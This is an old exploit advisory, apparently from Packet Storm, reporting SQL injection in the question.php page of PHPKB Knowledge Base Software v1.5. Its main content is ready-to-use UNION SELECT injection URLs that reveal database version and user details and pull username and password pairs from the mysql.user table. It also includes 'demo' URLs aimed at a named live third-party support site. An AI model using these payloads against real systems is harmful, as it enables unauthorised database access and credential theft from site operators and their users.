phpkb-1.5-question.php.txt

2008-09-22T00:00:00
ID PACKETSTORM:70167
Type packetstorm
Reporter d3v1l
Modified 2008-09-22T00:00:00

Description

                                        
                                            `[~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability  
[~]   
[~] http://www.knowledgebase-script.com  
[~] ----------------------------------------------------------  
[~] Bug founded by d3v1l  
[~]   
[~] Date: 20.09.2007  
[~]  
[~]  
[~] d3v1l@spoofer.com  
[~]  
[~] -----------------------------------------------------------  
[~] Greetz tO:-  
[~]   
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]   
[~] Pentest|Gibon|Pig  
[~]-------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*  
[~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/*   
[~]   
[~] If he does not work test yet -> /question.php?ID=-1  
[~]   
[~] Demo :-   
[~]  
[~] http://support.prosoft-technology.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/*   
[~]   
[~] http://support.prosoft-technology.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/*  
[~]   
[~]----------------------------------------------------------------------------------------------------------------------  
  
__________________________________________________  
Do You Yahoo!?  
Poco spazio e tanto spam? Yahoo! Mail ti protegge dallo spam e ti da tanto spazio gratuito per i tuoi file e i messaggi   
http://mail.yahoo.it `